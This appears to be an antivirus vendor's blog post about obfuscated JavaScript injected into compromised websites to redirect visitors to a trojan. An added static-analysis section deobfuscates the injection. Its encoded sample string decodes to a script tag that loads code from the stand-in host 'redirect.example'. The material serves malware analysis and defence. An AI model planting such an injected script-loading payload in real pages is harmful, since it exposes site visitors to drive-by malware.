Viral Video Now Just Viral

…well actually it’s a trojan, but it’s still malicious!

Many readers will have had the misfortune of watching the viral video 2 Girls 1 Cup (SFW Wikipedia link), which spread across the internet like wildfire a couple of years ago. People trying to sign up to view the video on the official site will now get more than they bargained for.

In fact, over the last few days we've seen hundreds of compromised domains across the internet that have been infected. It seems some obfuscated JavaScript is being injected into these sites, which attempts to redirect the user to another domain hosting a malicious payload.

As you can see, there's nothing overly complicated about the obfuscation technique: they simply escape certain characters and insert a symbol at random intervals in the text. After deobfuscating the code, we see that another script tag is written, which points to the domain where the payload is hosted.
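The two deobfuscation steps described above, as an added static-analysis example that is not code from the original post or from the injected pages: strip the junk symbol, undo the escaping, and pull out the script target so it can be blocked or hunted for. The sample string, the junk symbol `!`, the host `redirect.example` and the function names are all assumptions made for illustration, and the sketch goes slightly further than the text by guessing the junk symbol instead of being told it.

```javascript
// Static analysis only: the blob is handled as text and never evaluated.
// Constructed sample, not the string from the infected pages. The junk
// symbol "!" and the host redirect.example are assumptions.
const SAMPLE =
  "%3!Cscr!ipt%2!0sr!c%3D%!22ht!tp%3A%2!F%2Fre!direct.exa!mple%2Fne!ws.js" +
  "%2!2%3E%3!C%2Fscr!ipt%3!E";

// Matches the src attribute of a script tag in the decoded text.
const SCRIPT_SRC = /<script[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/i;

// Percent-decode byte by byte; malformed sequences are left untouched
// instead of throwing, as decodeURIComponent would.
function safeUnescape(text) {
  return text.replace(/%([0-9a-f]{2})/gi, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Hostname of an absolute URL, or null for relative/invalid values.
function hostOf(url) {
  try { return new URL(url).hostname; } catch (e) { return null; }
}

// Try every punctuation character in the blob as the junk symbol: strip it,
// decode, and accept the first result that contains a script tag with a src.
function deobfuscate(blob) {
  const candidates = [...new Set(blob.match(/[^A-Za-z0-9%./:_-]/g) || [])];
  for (const junk of ["", ...candidates]) {
    const decoded = safeUnescape(blob.split(junk).join(""));
    const match = SCRIPT_SRC.exec(decoded);
    if (match) {
      return { junk, decoded, src: match[1], host: hostOf(match[1]) };
    }
  }
  return null; // no candidate produced a script tag
}

console.log(deobfuscate(SAMPLE));
```

Because the junk symbol can land inside an escape sequence (`%3!C`), it has to be stripped before decoding; doing the steps in the other order leaves the tag unreadable.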

At the time of writing this blog, the payload is no longer on the site, but we suspect it will reappear sometime in the near future.

Earlier in the week we detected a file at the script target URL as Troj/SWFLdr-A, but that file is no longer available.

Instead, users are greeted with a simple message saying “// No news…”. Customers will be happy to know that the original JavaScript redirector is detected as Troj/JSRedir-R.